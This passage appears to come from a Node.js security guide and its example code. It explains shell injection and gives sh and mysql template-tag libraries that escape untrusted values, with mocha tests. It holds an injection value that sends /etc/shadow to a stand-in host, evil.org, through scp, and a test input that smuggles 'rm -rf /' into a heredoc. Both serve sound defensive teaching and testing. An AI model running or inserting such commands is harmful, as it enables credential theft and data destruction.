shelljs.exec("executable '" + x + "'")
```

If an attacker causes

```js
x = " '; scp /etc/shadow evil@evil.org/; echo ' ";
```

then what gets passed to the shell is

```js
executable ' '; scp /etc/shadow evil@evil.org/; echo ' '
```

Instead, consider:

```js
shelljs.exec`executable ${x}`

shelljs.exec`executable '${x}'`
```

This use of tagged templates is roughly equivalent to

```js
shelljs.exec(["executable ", ""], x)

shelljs.exec(["executable \'", "\'"], x)
```

This way, when control reaches `shelljs`, it knows which strings came
from the developer: `["executable ", ""]`, and which are inline
expressions: `x`.  If `shelljs` properly escapes the latter, it
prevents the breach above.

The accompanying example ([code][sh-code]) includes a tag
implementation for `sh` and `bash` that recognizes complex nesting
semantics.

We can't, working within the confines of Node, prevent poorly written
command line tools from breaking when exposed to untrusted inputs, but
we can make sure that we preserve the developer's intent when they
write code that invokes command line tools.  For projects that have
legitimate reasons for invoking sub-shells, consistently using
template tags like this solves some problems and makes it more likely
that effort spent hardening command line tools will yield fruit.

[shell grammar]: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10
[shelljs]: https://www.npmjs.com/package/shelljs
[cp.spawn]: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options
[SHP]: ../chapter-1/threat-SHP.md
[BOF]: ../chapter-1/threat-BOF.md
[sh-code]: https://github.com/mikesamuel/sh-template-tag


================================================
FILE: chapter-7/examples/sh/index.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Usage:
 * {@code
 * const sh = require('sh-template-tag')
 * sh`echo ${foo}`
 * }
 */

const crypto = require('crypto')
const {
  memoizedTagFunction,
  trimCommonWhitespaceFromLines,
  TypedString
} = require('template-tag-common')

/** A regex chunk that matches only s. */
function reEsc (str) {
  return str.replace(/[\^\x5b\x5d\-\\]/g, '\\$&')
    .replace(/[*+(){}|$/.]/g, '[$&]')
}

/** The union of the given regex chunks. */
function reUnion (alternatives) {
  return `(?:${alternatives.join('|')})`
}

const ALL_DELIMS = [ '"', '\'', '#', '`', '$((', '$(', '${', '(', '<<-', '<<' ]
const NLS = [ '\n', '\r\n', '\r' ]

// Embedders take the value to embed and return the text to substitute. */
/** Embeds a value where a single quoted string token is allowed. */
function emsq (x) {
  if (x instanceof ShFragment) {
    return x.content
  }
  return `'${emisq(x)}'`
}
/** Embeds a string in an opened single quoted string */
function emisq (x) {
  if (x == null) { // eslint-disable-line no-eq-null
    // Intentionally matches undefined
    return ''
  }
  return String(x).replace(/'/g, `'"'"'`)
}
/** Embeds a string in an opened double quoted string */
function emidq (x) {
  if (x == null) { // eslint-disable-line no-eq-null
    // Intentionally matches undefined
    return ''
  }
  return String(x).replace(/[$"\\]/g, '\\$&')
}
/** Embeds in a comment, replacing the content with a space */
function emsp (x) {
  return ' '
}
/**
 * Embeds in heredoc.
 * We handle rewriting HEREDOC labels to avoid collisions later.
 */
function emhd (x) {
  return String(x)
}

/**
 * Maps start delimiters to their end delimiters and whether
 * '\\' and start delimiters are significant.
 *
 * Properties:
 * .ends: delimiters that end blocks that start with the key.
 * .embed: a function that converts values to content that embeds within
 *         the block.
 * .escapes: true iff backslash escapes a character that might otherwise
 *         participate in a start or end delimiter, or another backslash.
 * .nests: list of start delimiters that are significant in the block.
 *
 * Extra properties derived from above:
 * .bodyRegExp: matches a prefix of a string that is a chunk of body content.
 * .startRegExp: matches a start delimiter in nests at start of input
 * .endRegExp: matches an end delimiter at start of input.
 */
const DELIMS = {
  '': { ends: [], embed: emsq, escapes: false, nests: ALL_DELIMS },
  '"': { ends: [ '"' ], embed: emidq, escapes: true, nests: [ '`', '$((', '$(', '${' ] },
  '\'': { ends: [ '\'' ], embed: emisq, escapes: false, nests: [] },
  '`': { ends: [ '`' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  '$((': { ends: [ '))' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  '$(': { ends: [ ')' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  '${': { ends: [ '}' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  '(': { ends: [ ')' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  // '#' requires special handling below since it must follow whitespace
  '#': { ends: NLS, embed: emsp, escapes: false, nests: [] },
  // Heredoc requires special handling below to handle the nonce.
  '<<': { ends: NLS, embed: emhd, escapes: false, nests: [] },
  '<<-': { ends: NLS, embed: emhd, escapes: false, nests: [] }
}

// Flesh out the DELIMS table with derived information used by the lexer.
do {
  ((() => {
    for (const startDelim in DELIMS) {
      const delimInfo = DELIMS[startDelim]
      const { nests, ends, escapes } = delimInfo

      const startsPattern = nests.length ? reUnion(nests.map(reEsc)) : '(?!)'
      const endsPattern = ends.length ? reUnion(ends.map(reEsc)) : '(?!)'
      // Any number of (see Kleene-* below)
      let pattern = '^(?:'
      if (escapes) {
        // Any escaped character or ...
        pattern += '[\\\\][\\s\\S]|'
      }

      // Not one of ends
      pattern += `(?!${endsPattern}`
      if (nests.length) {
        pattern += `|${startsPattern}`
      }
      pattern += ')'

      // Character to match.
      pattern += escapes ? '[^\\\\]' : '[\\s\\S]'
      pattern += ')*'
      delimInfo.bodyRegExp = new RegExp(pattern)
      delimInfo.endRegExp = new RegExp(`^${endsPattern}`)
      delimInfo.startRegExp = new RegExp(`^${startsPattern}`)
    }
  })())
} while (0)

/** Template tag that creates a new Error with a message. */
function fail (strs, ...dyn) {
  let [ msg ] = strs
  for (let i = 0; i < dyn.length; ++i) {
    msg += JSON.stringify(dyn[i]) + strs[i + 1]
  }
  return new Error(msg)
}

const HASH_COMMENT_PRECEDER = /[\t\n\r (]$/

/** Skip over "<<" or "<<-" prefix to get the label. */
function heredocLabel (startDelim) {
  return startDelim.substring(2 + (startDelim[2] === '-'))
}

function heredocBodyRegExp (label) {
  return new RegExp(
    // Maximal run of non-CRLF characters or a CRLF character
    // that is not followed by the label and a newline after
    // a run of spaces or tabs.
    `^(?:[^\n\r]|(?![\n\r]${label}[\r\n])[\n\r])*`)
}

const START_CONTEXT = Object.freeze([ '', 0, 0, 0 ])

/**
 * Returns a function that can be fed chunks of input and
 * which returns the context in which interpolation occurs.
 * If the returned function is fed null, then it will
 * throw an error only if not in a valid end context.
 */
function makeLexer () {
  // A stack of (
  //     start delimiter,
  //     position of start in concatenation of chunks,
  //     position of start in current chunk)
  //     delimiter length in chunk
  // for each start delimiter for which we have not yet seen
  // an end delimiter.
  const delimiterStack = [ START_CONTEXT ]
  let position = 0

  function propagateContextOverChunk (origChunk) {
    // A suffix of origChunk that we consume as we tokenize.
    let chunk = origChunk
    while (chunk) {
      const top = delimiterStack[delimiterStack.length - 1]
      const [ topStartDelim ] = top
      let delimInfo = DELIMS[topStartDelim]
      let bodyRegExp = null
      if (delimInfo) {
        bodyRegExp = delimInfo.bodyRegExp // eslint-disable-line prefer-destructuring
      } else if (topStartDelim[0] === '<' && topStartDelim[1] === '<') {
        bodyRegExp = heredocBodyRegExp(heredocLabel(topStartDelim))
        delimInfo = DELIMS['<<']
      } else {
        throw fail`Failed to maximally match chunk ${chunk}`
      }
      const match = bodyRegExp.exec(chunk)
      if (!match) {
        // Can occur if a chunk ends in '\\' and bodyPattern
        // allows escapes.
        throw fail`Unprocessable content ${chunk} in context ${top}`
      }

      chunk = chunk.substring(match[0].length)
      position += match[0].length

      if (!chunk) {
        break
      }

      const afterDelimitedRegion = findDelimitedRegionInChunk(
        delimInfo, origChunk, chunk)
      if (afterDelimitedRegion.length >= chunk.length) {
        throw fail`Non-body content remaining ${chunk} that has no delimiter in context ${top}`
      }
      chunk = afterDelimitedRegion
    }
  }

  /**
   * Look for a matching end delimiter, or, if that fails,
   * apply nesting rules to figure out which kind of start delimiters
   * we might look for.
   *
   * @param delimInfo relating to the topmost delimiter on the stack
   * @param origChunk the entire chunk being lexed
   * @param chunk the suffix of origChunk starting with the delimiter start
   *
   * @return the suffix of chunk after processing any delimiter
   */
  function findDelimitedRegionInChunk (delimInfo, origChunk, chunk) {
    let match = delimInfo.endRegExp.exec(chunk)
    if (match) {
      if (delimiterStack.length === 1) {
        // Should never occur since DELIMS[''] does not have
        // any end delimiters.
        throw fail`Popped past end of stack`
      }
      --delimiterStack.length
      position += match[0].length
      return chunk.substring(match[0].length)
    } else if (delimInfo.nests.length) {
      match = delimInfo.startRegExp.exec(chunk)
      if (match) {
        return propagateContextOverDelimiter(origChunk, chunk, match)
      }
    }
    return chunk
  }

  /**
   * Does some delimiter specific parsing.
   *
   * @param origChunk the entire chunk being lexed
   * @param chunk the suffix of origChunk starting with the delimiter start
   * @param match the match of the delimiters startRegExp
   */
  function propagateContextOverDelimiter (origChunk, chunk, match) {
    let [ start ] = match
    let delimLength = start.length
    if (start === '#') {
      const chunkStartInWhole = origChunk.length - chunk.length
      if (chunkStartInWhole === 0) {
        // If we have a chunk that starts with a
        // '#' then we don't know whether two
        // ShFragments can be concatenated to
        // produce an unambiguous ShFragment.
        // Consider
        //    sh`foo ${x}#bar`
        // If x is a normal string, it will be
        // quoted, so # will be treated literally.
        // If x is a ShFragment that ends in a space
        // '#bar' would be treated as a comment.
        throw fail`'#' at start of ${chunk} is a concatenation hazard.  Maybe use \#`
      } else if (!HASH_COMMENT_PRECEDER.test(origChunk.substring(0, chunkStartInWhole))) {
        // A '#' is not after whitespace, so does
        // not start a comment.
        chunk = chunk.substring(1)
        position += 1
        return chunk
      }
    } else if (start === '<<' || start === '<<-') {
      // If the \w+ part below changes, also change the \w+ in fixupHeredoc.
      const fullDelim = /^<<-?[ \t]*(\w+)[ \t]*[\n\r]/.exec(chunk)
      // http://pubs.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html#tag_02_03
      // defines word more broadly.
      // We can't handle that level of complexity here
      // so fail for all heredoc that do not match word.
      if (!fullDelim) {
        throw fail`Failed to find heredoc word at ${chunk}.  Use a nonce generator instead of .`
      }
      start += fullDelim[1]
      delimLength = fullDelim[0].length
    }
    delimiterStack.push(Object.freeze(
      [ start, position, origChunk.length - chunk.length, delimLength ]))
    chunk = chunk.substring(delimLength)
    position += match[0].length
    return chunk
  }

  return (wholeChunk) => {
    if (wholeChunk === null) {
      // Test can end.
      if (delimiterStack.length !== 1) {
        throw fail`Cannot end in contexts ${delimiterStack.join(' ')}`
      }
    } else {
      propagateContextOverChunk(String(wholeChunk))
    }
    return delimiterStack[delimiterStack.length - 1]
  }
}

/**
 * A string wrapper that marks its content as a series of
 * well-formed SQL tokens.
 */
class ShFragment extends TypedString {}

/** Applies the lexer to the static parts. */
function computeShellContexts (staticStrings) {
  // Collect an array of parsing decisions so that
  // we don't need to rerun the lexer when a particalar tag use
  // is executed multiple times.
  const contexts = []
  const { raw } = trimCommonWhitespaceFromLines(staticStrings)

  const lexer = makeLexer()
  for (let i = 0, len = raw.length; i < len; ++i) {
    const chunk = raw[i]
    contexts.push(lexer(chunk))
  }

  // Require valid end state.
  lexer(null)

  return { contexts, raw }
}

/**
 * Composes an ShFragment whose content consists of staticStrings
 * interleaved with untrusted appropriately escaped.
 */
function composeShellString ({ contexts, raw }, staticStrings, untrusted) {
  const trusted = raw
  // A buffer onto which we accumulate output.
  const buf = [ trusted[0] ]
  let [ currentContext ] = contexts
  for (let i = 0, len = untrusted.length; i < len; ++i) {
    const newContext = contexts[i + 1]
    const value = untrusted[i]
    let [ delim ] = currentContext
    if (delim[0] === '<') {
      delim = '<<'
    }
    const embedder = DELIMS[delim].embed
    const chunk = trusted[i + 1]
    buf.push(embedder(value, buf, currentContext), chunk)
    if (currentContext !== newContext &&
        delim[0] === '<' && delim[1] === '<') {
      fixupHeredoc(buf, currentContext, newContext)
    }
    currentContext = newContext
  }

  return new ShFragment(buf.join(''))
}

/**
 * Double checks that dynamic content interpolated into a heredoc
 * string does not include the end word.
 * <p>
 * If it does, rewrites content on the buffer to use non-conflicting
 * start and end words.
 * <p>
 * If this functions fails to avoid a collision, it will fail with an
 * exception, but this should not reliably occur unless an attacker
 * can generate hash collisions.
 */
function fixupHeredoc (buf, heredocContext) {
  const [ delim, contextStart, contextOffset, delimLength ] = heredocContext
  let chunkLeft = 0
  let startChunkIndex = -1
  for (let i = 0, len = buf.length; i < len; ++i) {
    chunkLeft += buf[i].length
    if (chunkLeft >= contextStart) {
      startChunkIndex = i
      break
    }
  }
  if (startChunkIndex < 0) {
    throw fail`Cannot find heredoc start for ${heredocContext}`
  }
  const label = heredocLabel(delim)
  const endChunkIndex = buf.length - 1

  // Figure out how much of the last chunk is part of the body.
  const bodyRe = heredocBodyRegExp(label)
  const endChunk = buf[endChunkIndex]
  const lastBodyMatch = bodyRe.exec(endChunk)
  if (lastBodyMatch[0].length === endChunk.length) {
    throw fail`Could not find end of ${delim}`
  }

  const startChunk = buf[startChunkIndex]
  let body = startChunk.substring(contextOffset + delimLength)
  for (let i = startChunkIndex + 1; i < endChunkIndex; ++i) {
    body += buf[i]
  }
  body += lastBodyMatch[0]

  // Look for a premature end delimiter by looking at newline followed by body.
  const testBody = `\n${body}`
  if (bodyRe.exec(testBody)[0].length !== testBody.length) {
    // There is an embedded delimiter.
    // Choose a suffix that an attacker cannot predict.
    // An attacker would need to be able to generate sha256
    // collisions to embed both NL <label> and NL <label> <suffix>.
    let suffix = '_'
    suffix += crypto.createHash('sha256')
      .update(body, 'utf8')
      .digest('base64')
      .replace(/[=]+$/, '')
    const newLabel = label + suffix
    const newBodyRe = heredocBodyRegExp(newLabel)
    if (!newBodyRe.exec(testBody)[0].length === testBody.length) {
      throw fail`Cannot solve embedding hazard in ${body} in heredoc with ${label} due to hash collision`
    }

    const endDelimEndOffset = lastBodyMatch[0].length +
        endChunk.substring(lastBodyMatch[0].length)
          // If the \w+ part below changes, also change the \w+ in the lexer
          // after the check for << and <<- start delimiters.
          .match(/[\r\n]\w+/)[0].length
    const before = startChunk.substring(0, contextOffset + delimLength)
      .replace(/[\r\n]+$/, '')
    const after = startChunk.substring(contextOffset + delimLength)
    buf[startChunkIndex] = `${before}${suffix}\n${after}`
    buf[endChunkIndex] = (
      endChunk.substring(0, endDelimEndOffset) +
        suffix +
        endChunk.substring(endDelimEndOffset))
  }
}

const shTagFunction = memoizedTagFunction(
  computeShellContexts,
  composeShellString)

exports.sh = shTagFunction
exports.bash = shTagFunction
exports.ShFragment = ShFragment

if (global.it) {
  // Expose for testing.
  // Harmless if this leaks
  exports.makeLexer = makeLexer
}


================================================
FILE: chapter-7/examples/sh/package.json
================================================
{
  "name": "sh-template-tag",
  "description": "string template tags for safely composing shell strings",
  "keywords": [
    "shell",
    "child_process",
    "security",
    "injection",
    "template",
    "template-tag",
    "string-template",
    "sec-roadmap",
    "es6"
  ],
  "version": "0.0.0",
  "author": "Mike Samuel",
  "license": "Apache-2.0",
  "main": "index.js",
  "files": [
    "index.js"
  ],
  "dependencies": {
    "template-tag-common": ">=1.0.2"
  },
  "devDependencies": {
    "chai": ">=4.1.2",
    "eslint": ">=4.15.0",
    "eslint-config-strict": "*",
    "eslint-config-standard": "*",
    "mocha": ">=4.0.1",
    "standard": "*"
  },
  "scripts": {
    "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && ./node_modules/.bin/mocha"
  },
  "eslintConfig": {
    "extends": [
      "strict",
      "standard"
    ]
  }
}


================================================
FILE: chapter-7/examples/sh/test/test.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/* eslint "id-length": off */

const { expect } = require('chai')
const { describe, it } = require('mocha')
const { sh, ShFragment, makeLexer } = require('../index')

/**
 * Feeds chunks to the lexer and concatenates contexts.
 * Tests that the lexer ends in a valid end state and
 * appends '_ERR_' as an end state if not.
 */
function tokens (...chunks) {
  const lexer = makeLexer()
  const out = []
  for (let i = 0, len = chunks.length; i < len; ++i) {
    out.push(lexer(chunks[i])[0] || '_')
  }
  try {
    lexer(null)
  } catch (exc) {
    out.push('_ERR_')
  }
  return out.join(',')
}

// Unwrap an ShFragment, failing if the result is not one.
function unwrap (x) {
  if (x instanceof ShFragment) {
    return String(x)
  }
  throw new Error(`Expected ShFragment not ${JSON.stringify(x)}`)
}

// Run a test multiply  to exercise the memoizing code.
function runShTest (golden, test) {
  for (let i = 3; --i >= 0;) {
    if (golden === '_ERR_') {
      expect(test).to.throw()
    } else {
      expect(unwrap(test())).to.equal(golden)
    }
  }
}

describe('sh template tags', () => {
  describe('lexer', () => {
    it('empty string', () => {
      expect(tokens('')).to.equal('_')
    })
    it('word', () => {
      expect(tokens('foo')).to.equal('_')
    })
    it('words', () => {
      expect(tokens('foo bar baz')).to.equal('_')
    })
    it('words split', () => {
      expect(tokens('foo bar', ' ', 'baz')).to.equal('_,_,_')
    })
    it('parens', () => {
      expect(tokens('foo (bar) baz')).to.equal('_')
    })
    it('parens split', () => {
      expect('_,_,(,_,_,_').to.equal(
        tokens('foo', ', ', '(bar', ')', ' ', 'baz'))
    })
    it('parens hanging split', () => {
      expect('_,_,(,(,(,_ERR_').to.equal(
        tokens('foo', ', ', '(bar', ' ', 'baz'))
    })
    it('quotes embed subshell', () => {
      expect('",$(,_').to.equal(
        tokens(' "foo', '$(bar ', ' baz)" boo'))
    })
    it('quotes embed arithshell', () => {
      expect('",$((,$((,",_').to.equal(
        tokens(' "foo', '$((bar ', '(far)', ' baz))', 'q" boo'))
    })
    it('quotes embed backticks', () => {
      expect('",`,`,",_').to.equal(
        tokens(' "foo', '`bar ', '(far)', ' baz`', 'q" boo'))
    })
    it('escape affects subshell', () => {
      expect('",",",",_').to.equal(
        tokens(' "foo', '\\$((bar ', '(far)', ' baz))', 'q" boo'))
    })
    it('single quotes do not embed', () => {
      expect(`',',',',_`).to.equal(
        tokens(
          ' \' $(',
          'foo) $((',
          'bar))',
          ' `',
          ' ` # \' '))
    })
    it('unterminated comment', () => {
      expect('#,_ERR_').to.equal(
        tokens(' #foo'))
    })
    it('terminated comment', () => {
      expect('_').to.equal(
        tokens(' #foo\n'))
    })
    it('terminated comment split', () => {
      expect('#,_').to.equal(
        tokens(' #foo', 'bar\n'))
    })
    it('arithshell', () => {
      expect('_,$((,$((,_,_').to.equal(
        tokens('foo', ' $((bar ', '(far)', ' baz))', ' boo'))
    })
    it('backticks', () => {
      expect('_,`,`,_,_').to.equal(
        tokens('foo', '`bar ', '(far)', ' baz`', ' boo'))
    })
    it('subshell paren disambiguation', () => {
      expect('$(,(,$(,",_,_').to.equal(tokens(
        'echo "$(foo ', ' | (bar ', ' baz)', ' boo)', 'far" | ', ''))
    })
    it('hash not after space', () => {
      expect('_,_').to.equal(
        tokens('echo foo#', ''))
    })
    it('hash after space', () => {
      expect('#,#,_ERR_').to.equal(
        tokens('echo foo #', ''))
    })
    it('hash concatenation hazard', () => {
      expect(() => tokens('#foo')).to.throw()
    })
    it('intermediate concatenation hazard', () => {
      expect(() => tokens('echo foo', '#bar')).to.throw()
    })
    it('escaped intermediate concatenation hazard', () => {
      expect('_,_').to.equal(tokens(
        'echo foo', '\\#bar'))
    })
    it('simple heredoc', () => {
      expect(tokens('cat <<EOF\nFoo bar\nEOF\n')).to.equal('_')
    })
    it('heredoc hazard', () => {
      // Concatenation hazard when no eol at end
      expect(tokens('cat <<EOF\nFoo bar\nEOF')).to.equal('<<EOF,_ERR_')
    })
    it('split heredoc', () => {
      expect(tokens('cat <<EOF\nFoo', ' bar\nEOF\n')).to.equal('<<EOF,_')
    })
    it('split heredoc sp', () => {
      expect(tokens('cat << EOF\nFoo', ' bar\nEOF\n')).to.equal('<<EOF,_')
    })
    it('split heredoc-', () => {
      expect(tokens('cat <<-EOF\nFoo', ' bar\nEOF\n')).to.equal('<<-EOF,_')
    })
    it('bad heredoc label', () => {
      expect(() => tokens('cat << "EOF"\nFoo bar\nEOF;')).to.throw()
    })
    it('missing heredoc label', () => {
      expect(() => tokens('cat <<', '\nfoo bar\n', ';')).to.throw()
    })
  })

  const str = 'a"\'\n\\$b'
  const numb = 1234
  const frag = new ShFragment(' frag ')
  describe('template tag', () => {
    it('string in top level', () => {
      runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo ${str}`)
    })
    it('number in top level', () => {
      runShTest(`echo '1234'`, () => sh`echo ${numb}`)
    })
    it('fragment in top level', () => {
      runShTest(`echo  frag `, () => sh`echo ${frag}`)
    })
    it('string in dq', () => {
      runShTest(`echo "a\\"'\n\\\\\\$b"`, () => sh`echo "${str}"`)
    })
    it('number in dq', () => {
      runShTest(`echo "1234"`, () => sh`echo "${numb}"`)
    })
    it('fragment in dq', () => {
      runShTest(`echo " frag "`, () => sh`echo "${frag}"`)
    })
    it('string in sq', () => {
      runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo '${str}'`)
    })
    it('number in sq', () => {
      runShTest(`echo '1234'`, () => sh`echo '${numb}'`)
    })
    it('fragment in sq', () => {
      runShTest(`echo ' frag '`, () => sh`echo '${frag}'`)
    })
    it('string in embed', () => {
      runShTest(
        `echo $(echo 'a"'"'"'\n\\$b')`,
        () => sh`echo $(echo ${str})`)
    })
    it('number in embed', () => {
      runShTest(
        `echo $(echo '1234')`,
        () => sh`echo $(echo ${numb})`)
    })
    it('fragment in embed', () => {
      runShTest(
        `echo $(echo  frag )`,
        () => sh`echo $(echo ${frag})`)
    })
    it('hash ambig string', () => {
      runShTest(`_ERR_`, () => sh`echo foo${str}#bar`)
    })
    it('hash ambig fragment', () => {
      runShTest(`_ERR_`, () => sh`echo foo${frag}#bar`)
    })
    it('heredoc string', () => {
      runShTest(
        '\ncat <<EOF\na"\'\n\\$b\nEOF\n',
        () => sh`
cat <<EOF
${str}
EOF
`)
    })
    it('heredoc number', () => {
      runShTest(
        '\ncat <<EOF\n1234\nEOF\n',
        () => sh`
cat <<EOF
${numb}
EOF
`)
    })
    it('heredoc fragment', () => {
      runShTest(
        '\ncat <<EOF\n frag \nEOF\n',
        () => sh`
cat <<EOF
${frag}
EOF
`)
    })
    it('heredoc sneaky', () => {
      runShTest(
        `
cat <<EOF_ZQHNfpzxDMLfdgCg8NUgxceUCSQiISNU1zQuqzI6uzs
EOF
rm -rf /
cat <<EOF
EOF_ZQHNfpzxDMLfdgCg8NUgxceUCSQiISNU1zQuqzI6uzs
`,

        () => sh`
cat <<EOF
${'EOF\nrm -rf /\ncat <<EOF'}
EOF
`)
    })
  })
})


================================================
FILE: chapter-7/examples/sql/index.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

const mysql = require('mysql')
const {
  memoizedTagFunction,
  trimCommonWhitespaceFromLines,
  TypedString
} = require('template-tag-common')

// A simple lexer for SQL.
// SQL has many divergent dialects with subtly different
// conventions for string escaping and comments.
// This just attempts to roughly tokenize MySQL's specific variant.
// See also
// https://www.w3.org/2005/05/22-SPARQL-MySQL/sql_yacc
// https://github.com/twitter/mysql/blob/master/sql/sql_lex.cc
// https://dev.mysql.com/doc/refman/5.7/en/string-literals.html

// "--" followed by whitespace starts a line comment
// "#"
// "/*" starts an inline comment ended at first "*/"
// \N means null
// Prefixed strings x'...' is a hex string,  b'...' is a binary string, ....
// '...', "..." are strings.  `...` escapes identifiers.
// doubled delimiters and backslash both escape
// doubled delimiters work in `...` identifiers

const PREFIX_BEFORE_DELIMITER = new RegExp(
  '^(?:' +
    (
      // Comment
      '--(?=[\\t\\r\\n ])[^\\r\\n]*' +
      '|#[^\\r\\n]*' +
      '|/[*][\\s\\S]*?[*]/'
    ) +
    '|' +
    (
      // Run of non-comment non-string starts
      '(?:[^\'"`\\-/#]|-(?!-)|/(?![*]))'
    ) +
    ')*')
const DELIMITED_BODIES = {
  '\'': /^(?:[^'\\]|\\[\s\S]|'')*/,
  '"': /^(?:[^"\\]|\\[\s\S]|"")*/,
  '`': /^(?:[^`\\]|\\[\s\S]|``)*/
}

/** Template tag that creates a new Error with a message. */
function msg (strs, ...dyn) {
  let message = String(strs[0])
  for (let i = 0; i < dyn.length; ++i) {
    message += JSON.stringify(dyn[i]) + strs[i + 1]
  }
  return message
}

/**
 * Returns a function that can be fed chunks of input and which
 * returns a delimiter context.
 */
function makeLexer () {
  let errorMessage = null
  let delimiter = null
  return (text) => {
    if (errorMessage) {
      // Replay the error message if we've already failed.
      throw new Error(errorMessage)
    }
    text = String(text)
    while (text) {
      const pattern = delimiter
        ? DELIMITED_BODIES[delimiter]
        : PREFIX_BEFORE_DELIMITER
      const match = pattern.exec(text)
      if (!match) {
        throw new Error(
          errorMessage = msg`Failed to lex starting at ${text}`)
      }
      let nConsumed = match[0].length
      if (text.length > nConsumed) {
        const chr = text.charAt(nConsumed)
        if (delimiter) {
          if (chr === delimiter) {
            delimiter = null
            ++nConsumed
          } else {
            throw new Error(
              errorMessage = msg`Expected ${chr} at ${text}`)
          }
        } else if (Object.hasOwnProperty.call(DELIMITED_BODIES, chr)) {
          delimiter = chr
          ++nConsumed
        } else {
          throw new Error(
            errorMessage = msg`Expected delimiter at ${text}`)
        }
      }
      text = text.substring(nConsumed)
    }
    return delimiter
  }
}

/** A string wrapper that marks its content as a SQL identifier. */
class Identifier extends TypedString {}

/**
 * A string wrapper that marks its content as a series of
 * well-formed SQL tokens.
 */
class SqlFragment extends TypedString {}

/**
 * Analyzes the static parts of the tag content.
 *
 * @return An record like { delimiters, chunks }
 *     where delimiter is a contextual cue and chunk is
 *     the adjusted raw text.
 */
function computeStatic (strings) {
  const { raw } = trimCommonWhitespaceFromLines(strings)

  const delimiters = []
  const chunks = []

  const lexer = makeLexer()

  let delimiter = null
  for (let i = 0, len = raw.length; i < len; ++i) {
    let chunk = String(raw[i])
    if (delimiter === '`') {
      // Treat raw \` in an identifier literal as an ending delimiter.
      chunk = chunk.replace(/^([^\\`]|\\[\s\S])*\\`/, '$1`')
    }
    const newDelimiter = lexer(chunk)
    if (newDelimiter === '`' && !delimiter) {
      // Treat literal \` outside a string context as starting an
      // identifier literal
      chunk = chunk.replace(
        /((?:^|[^\\])(?:\\\\)*)\\(`(?:[^`\\]|\\[\s\S])*)$/, '$1$2')
    }

    chunks.push(chunk)
    delimiters.push(newDelimiter)
    delimiter = newDelimiter
  }

  if (delimiter) {
    throw new Error(`Unclosed quoted string: ${delimiter}`)
  }

  return { raw, delimiters, chunks }
}

function interpolateSqlIntoFragment (
  { raw, delimiters, chunks }, strings, values) {
  // A buffer to accumulate output.
  let [ result ] = chunks
  for (let i = 1, len = raw.length; i < len; ++i) {
    const chunk = chunks[i]
    // The count of values must be 1 less than the surrounding
    // chunks of literal text.
    if (i !== 0) {
      const delimiter = delimiters[i - 1]
      const value = values[i - 1]
      if (delimiter) {
        result += escapeDelimitedValue(value, delimiter)
      } else {
        result = appendValue(result, value, chunk)
      }
    }

    result += chunk
  }

  return new SqlFragment(result)
}

function escapeDelimitedValue (value, delimiter) {
  if (delimiter === '`') {
    return mysql.escapeId(String(value)).replace(/^`|`$/g, '')
  }
  const escaped = mysql.escape(String(value))
  return escaped.substring(1, escaped.length - 1)
}

function appendValue (resultBefore, value, chunk) {
  let needsSpace = false
  let result = resultBefore
  const valueArray = Array.isArray(value) ? value : [ value ]
  for (let i = 0, nValues = valueArray.length; i < nValues; ++i) {
    if (i) {
      result += ', '
    }

    const one = valueArray[i]
    let valueStr = null
    if (one instanceof SqlFragment) {
      if (!/(?:^|[\n\r\t ,\x28])$/.test(result)) {
        result += ' '
      }
      valueStr = one.toString()
      needsSpace = i + 1 === nValues
    } else if (one instanceof Identifier) {
      valueStr = mysql.escapeId(one.toString())
    } else {
      // If we need to handle nested arrays, we would recurse here.
      valueStr = mysql.format('?', one)
    }
    result += valueStr
  }

  if (needsSpace && chunk && !/^[\n\r\t ,\x29]/.test(chunk)) {
    result += ' '
  }

  return result
}

/**
 * Template tag function that contextually autoescapes values
 * producing a SqlFragment.
 */
const sql = memoizedTagFunction(computeStatic, interpolateSqlIntoFragment)

exports.Identifier = Identifier
exports.SqlFragment = SqlFragment
exports.sql = sql

if (global.it) {
  // Expose for testing.
  // Harmless if this leaks
  exports.makeLexer = makeLexer
}


================================================
FILE: chapter-7/examples/sql/package.json
================================================
{
  "name": "mysql-template-tag",
  "description": "string template tags for safely composing SQL",
  "keywords": [
    "sql",
    "security",
    "injection",
    "template",
    "template-tag",
    "string-template",
    "sec-roadmap",
    "es6"
  ],
  "version": "0.0.0",
  "author": "Mike Samuel",
  "license": "Apache-2.0",
  "main": "index.js",
  "files": [
    "index.js"
  ],
  "dependencies": {
    "mysql": "2.15.0",
    "template-tag-common": ">=1.0.2"
  },
  "devDependencies": {
    "chai": ">=4.1.2",
    "eslint": ">=4.15.0",
